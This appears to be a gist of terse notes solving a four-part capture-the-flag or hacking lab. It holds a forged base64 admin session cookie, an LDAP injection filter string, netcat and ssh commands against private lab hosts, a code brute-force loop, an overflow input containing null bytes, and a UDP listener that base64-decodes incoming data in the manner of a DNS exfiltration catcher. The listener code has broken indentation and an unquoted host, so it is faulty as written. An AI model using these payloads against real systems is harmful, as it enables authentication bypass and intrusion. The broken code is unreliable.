Sanduuz/pwnnn.md

## pwnnn.md

      
    Raw
  

              pwnnn.md
            
          
    Part 1

username=admin::logged_in=true
dXNlcm5hbWU9YWRtaW46OmxvZ2dlZF9pbj10cnVl
sess=dXNlcm5hbWU9YWRtaW46OmxvZ2dlZF9pbj10cnVl
))(|(cn=*
ssh user@10.4.4.4
Part 2

nc 10.3.3.3 9000
x = int(input("Code: "))

for i in range(1, 10000):
	if 0xdeadf007 % i == x:
		print(f"Code found: {i}")


ssh user@10.3.3.3
Part 3

python -c 'print("ABCDEFGH\x00\x00\x00\x00\n8")' | nc 10.2.2.2 9000
Part 4

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

host = 0.0.0.0
port = 5300

print(f"Listening on udp {host}:{port}")
s.bind((host, port))
    while True:
        (data, addr) = s.recvfrom(128*1024)

	x = 13
	parsed_data = base64.b64decode(data[x:x+int(data[12])])
	print(f"Data: {parsed_data}")